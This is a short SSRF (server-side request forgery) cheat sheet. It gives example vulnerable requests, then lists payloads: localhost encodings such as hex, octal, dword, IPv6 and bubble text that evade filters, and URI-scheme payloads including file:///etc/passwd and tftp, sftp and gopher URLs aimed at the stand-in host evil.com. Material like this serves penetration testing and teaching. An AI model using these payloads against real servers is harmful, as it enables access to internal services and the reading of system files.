Server Side Request Forgery (SSRF)

Introduction

Server Side Request Forgery is a web application vulnerability that allows attackers to make outgoing requests originating from the vulnerable server

Where to find

Usually it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

1. Basic payload

   http://127.0.0.1:1337
   http://localhost:1337
   

2. Hex encoding

   http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
   

3. Octal encoding

   http://127.0.0.1 -> http://0177.0.0.01
   

4. Dword encoding

   http://127.0.0.1 -> http://2130706433
   

5. Mixed encoding

   http://127.0.0.1 -> http://0177.0.0.0x1
   

6. Using URL encoding

   http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74
   

7. Using IPv6

   http://0000::1:1337/
   http://[::]:1337/
   

8. Using bubble text

   http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
   
   Use this https://capitalizemytitle.com/bubble-text-generator/
   

How to exploit (URI Scheme)

1. File scheme

   file:///etc/passwd
   

2. Dict scheme

   dict://127.0.0.1:1337/
   

3. FTP scheme

   ftp://127.0.0.1/
   

4. TFTP scheme

   tftp://evil.com:1337/test
   

5. SFTP scheme

   sftp://evil.com:1337/test
   

6. LDAP scheme

   ldap://127.0.0.1:1337/
   

7. Gopher scheme

   gopher://evil.com/_Test%0ASSRF
   

References

• Vickie Li